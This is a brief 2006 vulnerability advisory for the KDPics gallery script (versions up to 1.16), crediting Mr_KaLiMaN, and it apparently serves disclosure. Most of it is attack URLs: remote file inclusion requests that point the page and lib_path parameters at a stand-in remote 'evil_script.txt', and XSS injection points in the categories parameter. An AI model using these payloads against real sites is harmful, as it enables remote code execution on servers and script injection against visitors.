Home / os / win2k

kdpics116.txt

Posted on 11 December 2006

KDPics 1.16 and prior -------------------- Vendor site: http://www.kdland.org/kdpics/ Product: KDPics <= 1.16 Vulnerability: Remote File Inclusion Vulnerability & XSS Credits: Mr_KaLiMaN Reported to Vendor: 30.11.06 Public disclosure: 09.12.06 Description: ------------ Remote File Inclusion Vulnerability: http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt? http://[victim]/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt? http://[victim]/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt? XSS: http://[victim]/[kdpics_path]/index.php3?page=galeries&categories=[XSS] http://[victim]/[kdpics_path]/galeries.inc.php3?categories=[XSS]

 

TOP